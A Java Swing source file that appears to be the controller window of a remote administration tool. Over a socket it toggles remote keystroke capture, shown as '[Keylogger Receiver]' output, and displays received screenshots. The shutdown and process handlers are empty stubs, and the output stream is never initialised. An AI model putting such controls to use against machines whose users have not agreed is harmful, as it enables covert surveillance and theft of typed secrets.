/*
 * Click nbfs://nbhost/SystemFileSystem/Templates/Licenses/license-default.txt to change this license
 * Click nbfs://nbhost/SystemFileSystem/Templates/GUIForms/JFrame.java to edit this template
 */
package Client;

import java.awt.Dimension;
import java.awt.Graphics;
import java.awt.HeadlessException;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.Socket;
import java.awt.Image;
import java.awt.Toolkit;
import java.io.ByteArrayInputStream;
import javax.imageio.ImageIO;
import javax.swing.ImageIcon;
import javax.swing.JDesktopPane;
import javax.swing.JOptionPane;

import javax.swing.JPanel;
import javax.swing.JToggleButton;

/**
 *
 * @author ad
 */
public class NewJFrame extends javax.swing.JFrame {

    private String KEYSTROKE_START = "start";
    private String KEYSTROKE_STOP = "stop";
    private Socket socket;
    static String port = "4907";
    private KeystrokeReceiver recv;
    private String ip;
    private DataOutputStream out;
    private Image img = null;

    public void setImg(Image img) {
        this.img = img;
    }
    public NewJFrame() throws HeadlessException {
    }
  

    /**
     * Creates new form NewJFrame
     */
    public NewJFrame(String ip, Socket sc) {
        this.socket = sc;
        this.ip = ip;
        initComponents();
        this.recv = new KeystrokeReceiver(socket);
    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        jDesktopPane2 = new javax.swing.JDesktopPane();
        shutdownBtn = new javax.swing.JButton();
        printScreenBtn = new javax.swing.JButton();
        openProcessBtn = new javax.swing.JButton();
        jDesktopPane1 = new javax.swing.JDesktopPane();
        jPanel2 = new javax.swing.JPanel();
        keystrokeBtn = new javax.swing.JToggleButton();

        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);

        shutdownBtn.setText("Shut Down");
        shutdownBtn.setActionCommand("c");
        shutdownBtn.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                shutdownBtnActionPerformed(evt);
            }
        });

        printScreenBtn.setText("Print Screen");
        printScreenBtn.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                printScreenBtnActionPerformed(evt);
            }
        });

        openProcessBtn.setText("Open Processes");
        openProcessBtn.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                openProcessBtnActionPerformed(evt);
            }
        });

        jDesktopPane1.setLayout(new java.awt.BorderLayout());

        javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2);
        jPanel2.setLayout(jPanel2Layout);
        jPanel2Layout.setHorizontalGroup(
            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 784, Short.MAX_VALUE)
        );
        jPanel2Layout.setVerticalGroup(
            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 522, Short.MAX_VALUE)
        );

        jDesktopPane1.add(jPanel2, java.awt.BorderLayout.CENTER);

        keystrokeBtn.setText("Start Keystroke");
        keystrokeBtn.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                keystrokeBtnActionPerformed(evt);
            }
        });

        jDesktopPane2.setLayer(shutdownBtn, javax.swing.JLayeredPane.DEFAULT_LAYER);
        jDesktopPane2.setLayer(printScreenBtn, javax.swing.JLayeredPane.DEFAULT_LAYER);
        jDesktopPane2.setLayer(openProcessBtn, javax.swing.JLayeredPane.DEFAULT_LAYER);
        jDesktopPane2.setLayer(jDesktopPane1, javax.swing.JLayeredPane.DEFAULT_LAYER);
        jDesktopPane2.setLayer(keystrokeBtn, javax.swing.JLayeredPane.DEFAULT_LAYER);

        javax.swing.GroupLayout jDesktopPane2Layout = new javax.swing.GroupLayout(jDesktopPane2);
        jDesktopPane2.setLayout(jDesktopPane2Layout);
        jDesktopPane2Layout.setHorizontalGroup(
            jDesktopPane2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jDesktopPane2Layout.createSequentialGroup()
                .addGap(31, 31, 31)
                .addGroup(jDesktopPane2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)
                    .addComponent(shutdownBtn, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                    .addComponent(openProcessBtn, javax.swing.GroupLayout.DEFAULT_SIZE, 241, Short.MAX_VALUE)
                    .addComponent(printScreenBtn, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                    .addComponent(keystrokeBtn, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
                .addGap(33, 33, 33)
                .addComponent(jDesktopPane1)
                .addGap(23, 23, 23))
        );
        jDesktopPane2Layout.setVerticalGroup(
            jDesktopPane2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jDesktopPane2Layout.createSequentialGroup()
                .addGap(113, 113, 113)
                .addGroup(jDesktopPane2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                    .addGroup(jDesktopPane2Layout.createSequentialGroup()
                        .addComponent(jDesktopPane1)
                        .addGap(118, 118, 118))
                    .addGroup(jDesktopPane2Layout.createSequentialGroup()
                        .addComponent(shutdownBtn, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                        .addGap(27, 27, 27)
                        .addComponent(printScreenBtn, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                        .addGap(30, 30, 30)
                        .addComponent(openProcessBtn, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                        .addGap(32, 32, 32)
                        .addComponent(keystrokeBtn, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                        .addGap(389, 389, 389))))
        );

        getContentPane().add(jDesktopPane2, java.awt.BorderLayout.CENTER);

        pack();
    }// </editor-fold>//GEN-END:initComponents

    private void printScreenBtnActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_printScreenBtnActionPerformed
        // TODO add your handling code here:
       
            //Draw the received screenshot
            img.getScaledInstance(300, 200, Image.SCALE_FAST);
            JOptionPane.showMessageDialog(this, "Screen capture:\n", "Screenshot",
                     JOptionPane.INFORMATION_MESSAGE, new ImageIcon(img));
       


    }//GEN-LAST:event_printScreenBtnActionPerformed

    private void shutdownBtnActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_shutdownBtnActionPerformed
        // TODO add your handling code here:
    }//GEN-LAST:event_shutdownBtnActionPerformed

    private void openProcessBtnActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_openProcessBtnActionPerformed
        // TODO add your handling code here:
    }//GEN-LAST:event_openProcessBtnActionPerformed

    private void keystrokeBtnActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_keystrokeBtnActionPerformed
        // TODO add your handling code here:
        System.err.println(evt.getActionCommand());

        if (evt.getActionCommand() == "Start Keystroke") {

            try {
                out.writeUTF(KEYSTROKE_START);
            } catch (IOException e) {
            }

            this.recv.emptyMessage();
            JToggleButton srcButton = (JToggleButton) evt.getSource();
            srcButton.setActionCommand("Stop Keystroke");
            srcButton.setText("Stop Keystroke");

        } else if (evt.getActionCommand() == "Stop Keystroke") {

            try {
                out.writeUTF(KEYSTROKE_STOP);
            } catch (IOException e) {
            }

//            System.out.println(this.recv.getIsListenning());
            JOptionPane.showMessageDialog(this, "[Keylogger Receiver]: \n" + this.recv.getMessage());

            JToggleButton srcButton = (JToggleButton) evt.getSource();
            srcButton.setActionCommand("Start Keystroke");
            srcButton.setText("Start Keystroke");

        }

    }//GEN-LAST:event_keystrokeBtnActionPerformed

    /**
     * @param args the command line arguments
     */

    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JDesktopPane jDesktopPane1;
    private javax.swing.JDesktopPane jDesktopPane2;
    public static javax.swing.JPanel jPanel2;
    private javax.swing.JToggleButton keystrokeBtn;
    private javax.swing.JButton openProcessBtn;
    private javax.swing.JButton printScreenBtn;
    private javax.swing.JButton shutdownBtn;
    // End of variables declaration//GEN-END:variables
   public JPanel getjPanel2() {
        return jPanel2;
    }

    public JDesktopPane getjDesktopPane1() {
        return jDesktopPane1;
    }

}
